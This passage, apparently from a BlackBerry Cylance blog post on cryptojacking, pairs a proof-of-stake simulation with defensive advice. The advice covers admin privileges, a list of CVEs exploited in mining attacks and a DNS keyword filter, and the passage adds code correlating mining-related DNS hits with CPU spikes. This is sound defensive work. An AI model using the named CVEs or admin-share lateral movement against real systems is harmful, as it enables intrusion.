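    """Pick the validator whose stake interval contains u in [0, 1); interval width = stake share."""
    total = sum(stakes.values())
    threshold = u * total
    running = 0.0
    for name, stake in stakes.items():  # dict order is insertion order, so this is deterministic
        running += stake
        if threshold < running:
            return name
    return name  # guards against floating-point rounding when u is very close to 1


def simulate(stakes: dict, rounds: int, reward: float, seed: int = 7) -> dict:
    """Run `rounds` selections, crediting `reward` to each winner's stake. Returns final stakes."""
    rng = random.Random(seed)  # seeded so the run is reproducible
    stakes = dict(stakes)
    for _ in range(rounds):
        winner = select_validator(stakes, rng.random())
        stakes[winner] += reward
    return stakes


def stake_shares(stakes: dict) -> dict:
    """Each validator's fraction of total stake, i.e. its selection probability next round."""
    total = sum(stakes.values())
    return {name: stake / total for name, stake in stakes.items()}


if __name__ == "__main__":
    initial = {"whale": 90.0, "small1": 5.0, "small2": 5.0}  # constructed stakes
    final = simulate(initial, rounds=1000, reward=1.0)
    print("initial shares:", stake_shares(initial))
    print("final shares:  ", stake_shares(final))
```

Because rewards are paid in the same asset that determines selection weight, the process is self-reinforcing: the expected share of each validator never changes, but a holder that starts large is selected and paid proportionally often, which is the concentration concern the paragraph above points to.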

Combating Threats in The Cyber World

So where do we go from here, and how do we protect ourselves from the dangers of the unknown? Our last section provides some ways to help protect your assets. Security should be treated as a lifestyle, and when we implement and practice proper security procedures, they become a habit.

Here are some procedures for IT admins and teams to practice:

  • Isolate administrative privileges. Always ask yourself why a user should have administrative access to a system or network if accessing that system is not a core function of the person’s job or role. Giving people access to all systems because it’s easier than individually determining need in each use case is a surefire ticket to disaster. Lateral movement is commonly seen in cryptomining attacks; common shares used in lateral movement include the Windows admin shares, such as C$, ADMIN$, and IPC$.

  • Always keep systems patched. There’s no excuse for not keeping systems updated when patches are easily and (in most cases) freely available. The following are a few common vulnerabilities that have been exploited during cryptojacking attacks:
    ◦  CVE-2019-2725
    ◦  CVE-2018-7602
    ◦  CVE-2017-0143
    ◦  CVE-2017-0144
    ◦  CVE-2017-0145
    ◦  CVE-2017-0146
    ◦  CVE-2017-0148
    ◦  CVE-2017-3506
    ◦  CVE-2017-10271
    ◦  CVE-2017-12149
    ◦  CVE-2017-8464
    ◦  CVE-2017-0176
    ◦  CVE-2017-12635
    ◦  CVE-2017-12636
  • Monitor Scheduled Jobs. IT admins should monitor DNS queries by filtering for text strings related to cryptocurrency mining, for example: "Bitcoin|Crypto|Cryptonight|Pool|BTC|XMR|Monero|Minergate|CoinHive|Zcash". When monitoring, look closely for elevated CPU spikes. Be aware that a sudden CPU spike after visiting a website is abnormal and may be a telltale sign that a cryptominer has infected the system.
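Here is how that DNS filter can be run over query logs and tied to the CPU observation in the same bullet. The script below is an addition to this article, not code from the original post or from any product; it applies the article's keyword pattern to constructed DNS query log lines, keeps a short allowlist because the bare keyword `Pool` also matches legitimate names such as pool.ntp.org, and then correlates the hits with constructed per-host CPU samples so that a host with both a mining-related lookup and sustained high CPU is ranked above one with only a CPU spike. The log format, thresholds, addresses and verdict labels are assumptions.

```python
import re
from collections import defaultdict

# Keyword pattern exactly as suggested in the article, matched case-insensitively.
MINING_KEYWORDS = re.compile(
    r"Bitcoin|Crypto|Cryptonight|Pool|BTC|XMR|Monero|Minergate|CoinHive|Zcash", re.I)
# Constructed allowlist: legitimate names that the keyword "Pool" would otherwise flag.
ALLOWLIST_SUFFIXES = ("pool.ntp.org",)


def is_mining_query(qname: str) -> bool:
    qname = qname.rstrip(".").lower()
    if any(qname == s or qname.endswith("." + s) for s in ALLOWLIST_SUFFIXES):
        return False
    return MINING_KEYWORDS.search(qname) is not None


def parse_dns_log(text: str):
    """Assumed log format: '<timestamp> <client_ip> <query_name>' per line. Returns hits per client."""
    hits = defaultdict(list)
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 3:
            continue
        ts, client, qname = parts
        if is_mining_query(qname):
            hits[client].append((ts, qname))
    return hits


def sustained_high_cpu(samples, threshold=90, min_consecutive=3) -> bool:
    """True if at least `min_consecutive` consecutive samples reach the threshold (percent)."""
    run = 0
    for value in samples:
        run = run + 1 if value >= threshold else 0
        if run >= min_consecutive:
            return True
    return False


def correlate(dns_log: str, cpu_samples: dict) -> dict:
    """Map each host to a verdict; hosts with neither signal are left out."""
    dns_hits = parse_dns_log(dns_log)
    verdicts = {}
    for host in set(dns_hits) | set(cpu_samples):
        dns = host in dns_hits
        cpu = sustained_high_cpu(cpu_samples.get(host, []))
        if dns and cpu:
            verdicts[host] = "dns-indicator+high-cpu"
        elif dns:
            verdicts[host] = "dns-indicator-only"
        elif cpu:
            verdicts[host] = "high-cpu-only"
    return verdicts


# Constructed DNS query log and per-host CPU samples (percent, one per interval).
DNS_LOG = """2019-11-04T10:00:01Z 10.0.0.5 pool.ntp.org
2019-11-04T10:00:03Z 10.0.0.7 xmr.pool.example
2019-11-04T10:00:04Z 10.0.0.7 minergate.example
2019-11-04T10:00:09Z 10.0.0.9 www.example.com
2019-11-04T10:00:12Z 10.0.0.5 updates.example.com
2019-11-04T10:00:15Z 10.0.0.11 btc.example"""
CPU_SAMPLES = {
    "10.0.0.5": [12, 15, 11, 14],
    "10.0.0.7": [97, 98, 99, 96],
    "10.0.0.9": [95, 93, 92, 94],
    "10.0.0.11": [20, 88, 91, 30],
}

if __name__ == "__main__":
    for host, verdict in sorted(correlate(DNS_LOG, CPU_SAMPLES).items()):
        print(f"{host:10s} {verdict}")
```

The keyword list is deliberately broad, so treat a DNS hit as a reason to look at the host rather than a verdict on its own; the CPU correlation is what separates 10.0.0.7 from a host that merely resolved a name containing "crypto" or "pool".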

If you’d like to learn more about blockchain, check out

Further Reading


NOTE: Cryptomining code samples and web references are provided for educational use only. BlackBerry Cylance and BlackBerry LTD are not responsible for any personal, corporate or financial losses resulting from readers attempting to carry out cryptomining or any associated practices mentioned or linked to in this educational writeup. 

Bronson Boersma

About Bronson Boersma

Senior Threat Researcher at BlackBerry Cylance

Bronson Boersma is a Senior Threat Researcher at BlackBerry Cylance.